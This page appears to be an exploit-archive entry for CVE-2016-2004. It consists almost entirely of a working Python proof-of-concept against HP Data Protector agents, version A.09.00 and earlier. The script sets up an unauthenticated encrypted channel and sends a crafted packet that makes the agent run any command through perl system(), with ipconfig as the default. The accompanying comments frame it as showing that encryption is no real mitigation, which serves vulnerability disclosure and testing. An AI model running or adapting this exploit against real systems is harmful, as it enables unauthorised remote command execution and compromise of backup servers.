HP Data Protector A.09.00 - Arbitrary Command Execution
Source: vfocus.net  Author: IanLovering  Published: 2016-05-30
#!/usr/bin/python
#
# Exploit Title: Data Protector Encrypted Communications
# Date: 26-05-2016
# Exploit Author: Ian Lovering
# Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/
# Version: A.09.00 and earlier
# Tested on: Windows Server 2008
# CVE : CVE-2016-2004
#
 
#   This proof of concept demonstrates that enabling encrypted control communication on
#   Data Protector agents does not provide any additional security.
#   As it provides no authentication, it is not a viable workaround to prevent the
#   exploitation of well-known Data Protector issues such as CVE-2014-2623.
#
#   This exploit establishes an unauthenticated encrypted communication channel to
#   a Data Protector agent and uses a well-known unencrypted Data Protector vulnerability
#   to run arbitrary commands on the target.
 
#   Tested on Kali Linux 2 with python 2.7.9
#   Tested against Data Protector A.09.00 (Internal Build version 88) with encrypted control
#   communication enabled.
#   All other Data Protector settings are default.
#   Tested against Data Protector agent running on Windows 2008 R2
#   Also tested against Data Protector A.07
#
#   encrypted-dataprotector.py -e <ipaddress>
#
#   By default runs ipconfig on the target.
#   Can take a little while to return. Have patience ;)
#
#   CVE-2016-2004
 
import socket
import ssl
import time
import struct
import argparse
 
 
parser = argparse.ArgumentParser(prog='test-encrypt.py')
parser.add_argument('-e', '--encrypt', dest='encrypt', action='store_true')
parser.add_argument('-p', '--port', type=int)
parser.add_argument('-c', '--command')
parser.add_argument('ipaddress')
parser.set_defaults(encrypt=False,port=5555)
args = parser.parse_args()
 
HOST = args.ipaddress
PORT = args.port
 
command = 'ipconfig'
 
if args.command:
    command = args.command
 
# initialise data
initdata = ("\x00\x00\x00\x48\xff\xfe\x32\x00\x36\x00\x37\x00\x00\x00\x20\x00"
        "\x31\x00\x30\x00\x00\x00\x20\x00\x31\x00\x30\x00\x30\x00\x00\x00"
        "\x20\x00\x39\x00\x30\x00\x30\x00\x00\x00\x20\x00\x38\x00\x38\x00"
        "\x00\x00\x20\x00\x6f\x00\x6d\x00\x6e\x00\x69\x00\x64\x00\x6c\x00"
        "\x63\x00\x00\x00\x20\x00\x34\x00\x00\x00\x00\x00")
 
OFFSET = 46
command = command.replace("\\", "\\\\")
command = command.replace("\'", "\\\'")
command_length = struct.pack(">I",OFFSET + len(command))
payload = command_length         +\
    "\x32\x00\x01\x01\x01\x01\x01\x01" +\
    "\x00\x01\x00\x01\x00\x01\x00\x01" +\
    "\x01\x00\x20\x32\x38\x00\x5c\x70" +\
    "\x65\x72\x6c\x2e\x65\x78\x65\x00" +\
    "\x20\x2d\x65\x73\x79\x73\x74\x65" +\
    "\x6d('%s')\x00" % command
 
def get_data(sock):
    response = ''
    recv_len = 1
     
    while recv_len:
        data = sock.recv(4096)
        recv_len = len(data)
        response += data
        if recv_len < 4096:
            break
     
    return response
 
def get_dp_response(sock):
 
    print "===== Response ====="
    print
 
    while True:
 
        # Get information about response
        packed_length = sock.recv(4)
        if not packed_length:
            break
        n = struct.unpack(">I", packed_length)[0]
        tmpresponse = sock.recv(n)
        tmpresponse = tmpresponse.replace("\n", "")
        tmpresponse = tmpresponse.replace("\x00", "")
        tmpresponse = tmpresponse.replace("\xff\xfe\x39\x20", "")
        if tmpresponse.upper().find("*RETVAL*") != -1:
            break
        else:
            print tmpresponse
 
    print
    print "===== End ====="
    print
 
 
client = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
 
if args.encrypt:
    context = ssl.create_default_context()
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE
    context.set_ciphers('ALL')
 
try:
    client.connect(( HOST, PORT ))
    print "Connected"
 
    if args.encrypt:
        # send data protector init string
        client.send(initdata)
        response = get_data(client)
 
        # setup tls
        client = context.wrap_socket(client)
        print "Encryption Enabled"
     
    # send payload
    client.send(payload)
    print "Sent Payload"
    print ""
    print "===== Command ====="
    print
    print command
    print
    get_dp_response(client)
 
    client.close()
 
except Exception as e:
    print '[*] Exception. Exiting.'
    print e
    client.close()
 